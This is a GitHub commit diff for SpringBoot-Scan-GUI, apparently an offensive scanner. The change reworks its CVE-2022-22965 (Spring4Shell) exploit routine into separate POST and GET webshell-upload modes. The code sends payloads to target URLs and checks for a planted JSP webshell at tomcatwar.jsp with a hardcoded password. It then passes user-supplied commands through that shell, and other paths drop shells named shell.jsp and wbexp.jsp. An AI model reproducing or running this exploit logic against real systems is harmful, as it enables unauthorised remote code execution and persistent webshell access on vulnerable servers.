Skip to content

Commit f9f3b89

Browse files
authored
Add files via upload
1 parent 5ae1b99 commit f9f3b89

File tree

2 files changed

+42
-32
lines changed

2 files changed

+42
-32
lines changed

SpringBoot-Scan-GUI-Linux.py

Lines changed: 21 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,7 @@ def __init__(self):
4646
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
4747
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
4848
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
49-
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-aabyss-shell","22965-13exp-shell")
49+
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
5050
no_proxies = []
5151
proxy_list = []
5252
self.root = tk.Tk()
@@ -673,22 +673,27 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
673673
data1 = payload_linux
674674
data2 = payload_win
675675
getpayload = url + payload_http
676+
Vule = self.CVEs.get()
676677
try:
677678
requests.packages.urllib3.disable_warnings()
678679
if proxies != "":
679-
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
680-
sleep(1)
681-
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682-
sleep(1)
683-
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684-
sleep(1)
680+
if Vule == "22965-aabyss-shell-post":
681+
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682+
sleep(1)
683+
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684+
sleep(1)
685+
elif Vule == "22965-aabyss-shell-get":
686+
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
687+
sleep(1)
685688
else:
686-
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
687-
sleep(1)
688-
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
689-
sleep(1)
690-
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
691-
sleep(1)
689+
if Vule == "22965-aabyss-shell-post":
690+
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
691+
sleep(1)
692+
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
693+
sleep(1)
694+
elif Vule == "22965-aabyss-shell-get":
695+
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
696+
sleep(1)
692697
test = requests.get(url + "tomcatwar.jsp")
693698
if (test.status_code == 200) and ('aabysszg' in str(test.text)):
694699
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami"
@@ -833,7 +838,7 @@ def cve_2022_22965_exec(self):
833838
cmd = self.reverse_tcp.get()
834839
if self.CVEs.get() == 'CVE-2022-22965':
835840
url_shell = url + "shell.jsp?cmd={}".format(cmd)
836-
elif self.CVEs.get() == '22965-aabyss-shell':
841+
elif '22965-aabyss-shell' in self.CVEs.get():
837842
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
838843
elif self.CVEs.get() == '22965-13exp-shell':
839844
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1029,7 +1034,7 @@ def Vule(self):
10291034
self.CVE_2022_22963(i, proxies,execcmd)
10301035
elif Vule == "CVE-2022-22947":
10311036
self.CVE_2022_22947(i, proxies,execcmd)
1032-
elif Vule == "22965-aabyss-shell":
1037+
elif "22965-aabyss-shell" in Vule:
10331038
self.CVE_2022_22965_aabysszg(i, proxies)
10341039

10351040
else:
@@ -1051,7 +1056,7 @@ def Vule(self):
10511056
messagebox.showinfo("提示","执行命令不能为空,请重试!")
10521057
else:
10531058
self.CVE_2022_22947(url, proxies,execcmd)
1054-
elif Vule == "22965-aabyss-shell":
1059+
elif "22965-aabyss-shell" in Vule:
10551060
back = self.CVE_2022_22965_aabysszg(url, proxies)
10561061
if "[-]" in back:
10571062
back = "[+]执行二次验证中 等待5秒"

SpringBoot-Scan-GUI.py

Lines changed: 21 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -46,7 +46,7 @@ def __init__(self):
4646
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
4747
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
4848
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
49-
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-aabyss-shell","22965-13exp-shell")
49+
cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
5050
no_proxies = []
5151
proxy_list = []
5252
self.root = tk.Tk()
@@ -673,22 +673,27 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
673673
data1 = payload_linux
674674
data2 = payload_win
675675
getpayload = url + payload_http
676+
Vule = self.CVEs.get()
676677
try:
677678
requests.packages.urllib3.disable_warnings()
678679
if proxies != "":
679-
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
680-
sleep(1)
681-
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682-
sleep(1)
683-
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684-
sleep(1)
680+
if Vule == "22965-aabyss-shell-post":
681+
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
682+
sleep(1)
683+
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
684+
sleep(1)
685+
elif Vule == "22965-aabyss-shell-get":
686+
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
687+
sleep(1)
685688
else:
686-
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
687-
sleep(1)
688-
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
689-
sleep(1)
690-
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
691-
sleep(1)
689+
if Vule == "22965-aabyss-shell-post":
690+
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
691+
sleep(1)
692+
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
693+
sleep(1)
694+
elif Vule == "22965-aabyss-shell-get":
695+
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
696+
sleep(1)
692697
test = requests.get(url + "tomcatwar.jsp")
693698
if (test.status_code == 200) and ('aabysszg' in str(test.text)):
694699
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami"
@@ -833,7 +838,7 @@ def cve_2022_22965_exec(self):
833838
cmd = self.reverse_tcp.get()
834839
if self.CVEs.get() == 'CVE-2022-22965':
835840
url_shell = url + "shell.jsp?cmd={}".format(cmd)
836-
elif self.CVEs.get() == '22965-aabyss-shell':
841+
elif '22965-aabyss-shell' in self.CVEs.get():
837842
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
838843
elif self.CVEs.get() == '22965-13exp-shell':
839844
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1029,7 +1034,7 @@ def Vule(self):
10291034
self.CVE_2022_22963(i, proxies,execcmd)
10301035
elif Vule == "CVE-2022-22947":
10311036
self.CVE_2022_22947(i, proxies,execcmd)
1032-
elif Vule == "22965-aabyss-shell":
1037+
elif "22965-aabyss-shell" in Vule:
10331038
self.CVE_2022_22965_aabysszg(i, proxies)
10341039

10351040
else:
@@ -1051,7 +1056,7 @@ def Vule(self):
10511056
messagebox.showinfo("提示","执行命令不能为空,请重试!")
10521057
else:
10531058
self.CVE_2022_22947(url, proxies,execcmd)
1054-
elif Vule == "22965-aabyss-shell":
1059+
elif "22965-aabyss-shell" in Vule:
10551060
back = self.CVE_2022_22965_aabysszg(url, proxies)
10561061
if "[-]" in back:
10571062
back = "[+]执行二次验证中 等待5秒"

0 commit comments

Comments
 (0)